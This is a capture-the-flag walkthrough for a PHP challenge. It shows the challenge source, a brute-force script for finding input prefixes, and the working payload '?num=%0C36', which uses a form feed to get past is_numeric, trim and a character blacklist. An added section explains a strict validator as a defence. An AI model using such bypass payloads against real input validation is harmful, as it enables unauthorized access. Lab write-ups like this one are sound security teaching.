CTF-30 Solution Walkthrough

Track-子羽   ·   Posted 2021-11-17 15:20:23   ·   CTF & WP Section

Source code analysis:

    <?php
    include('flag.php');
    highlight_file(__FILE__);
    error_reporting(0);

    // Blacklist: rewrites the hex prefix, zero, dot, exponent marker and plus sign to "1"
    function filter($num)
    {
        $num = str_replace("0x", "1", $num);
        $num = str_replace("0", "1", $num);
        $num = str_replace(".", "1", $num);
        $num = str_replace("e", "1", $num);
        $num = str_replace("+", "1", $num);
        return $num;
    }

    $num = $_GET['num'];
    // Strict (!==) checks on the raw and trimmed string, loose (==) check on the filtered one
    if (is_numeric($num) and $num !== '36' and trim($num) !== '36' and filter($num) == '36')
    {
        // Loose comparison: numeric strings are compared by value
        if ($num == '36')
        {
            echo $flag;
        }
        else
        {
            echo "hacker!!";
        }
    }
    else
    {
        echo "hacker!!!";
    }
    ?>

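Auditing the code shows what is required.
num must satisfy all of the following: it passes the is_numeric() check, it is not identical to '36', it is still not identical to '36' after trim(), and it still equals 36 after going through filter(). Inside the branch, the loose comparison $num=='36' must also hold for the flag to be printed.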

Constructing a PoC:

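    <?php
    // Try every single-character prefix in front of "36"
    for ($i = 0; $i < 129; $i++)
    {
        $num = chr($i) . '36';
        // Keep prefixes that pass the first three conditions of the challenge
        if (trim($num) !== '36' && is_numeric($num) && $num !== '36')
        {
            echo urlencode(chr($i)) . "\n";
        }
    }
    ?>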

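Checking the output against an ASCII table (http://ascii.911cha.com/)
gives: %0C %2B(+) - . 0 1 2 3 4 5 6 7 8 9
Of these, only %0C (form feed) also gets past filter() and the final loose comparison: is_numeric() accepts a leading form feed, trim() does not strip it by default, and filter() leaves it untouched. The other candidates are either rewritten by filter() ("+", ".", "0") or change the numeric value (the "-" sign and the digits 1 to 9).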

Payload:

    ?num=%0C36
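The root cause is that is_numeric(), trim() and == each use a different idea of what "36" looks like. The following is an added example, not code from the original post: it lists the one-byte prefixes that keep the value loosely equal to '36' while evading the trim() check, then applies a stricter validator. The names surviving_prefixes() and is_canonical_int() are hypothetical.

```php
<?php
// Added example, not code from the original post.
// Leading whitespace tolerated by is_numeric(): " ", \t, \n, \r, \v, \f
// Stripped by trim() with no second argument:   " ", \t, \n, \r, \0, \v

/** One-byte prefixes for which "<byte>36" is accepted by is_numeric(),
 *  is loosely equal to '36', and is not reduced to '36' by default trim(). */
function surviving_prefixes(): array
{
    $found = [];
    for ($i = 0; $i < 256; $i++) {
        $s = chr($i) . '36';
        if (is_numeric($s) && $s == '36' && trim($s) !== '36') {
            $found[] = $i;
        }
    }
    return $found;
}

/** Hypothetical strict validator: canonical decimal digits only
 *  (no sign, whitespace, leading zero, dot or exponent).
 *  \A and \z anchor the whole string; "$" would allow a trailing newline. */
function is_canonical_int(string $s): bool
{
    return preg_match('/\A(?:0|[1-9][0-9]*)\z/', $s) === 1;
}

// Show how each surviving prefix is judged by the loose and the strict check.
foreach (surviving_prefixes() as $byte) {
    $s = chr($byte) . '36';
    printf(
        "prefix 0x%02X  urlencoded=%-6s  is_numeric=%s  canonical=%s\n",
        $byte,
        urlencode($s),
        var_export(is_numeric($s), true),
        var_export(is_canonical_int($s), true)
    );
}

// The bare string is the only spelling of 36 the strict validator accepts.
var_dump(is_canonical_int('36'));
```

Validating against one canonical form and then comparing with === removes the gap that a character blacklist like filter() leaves open.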
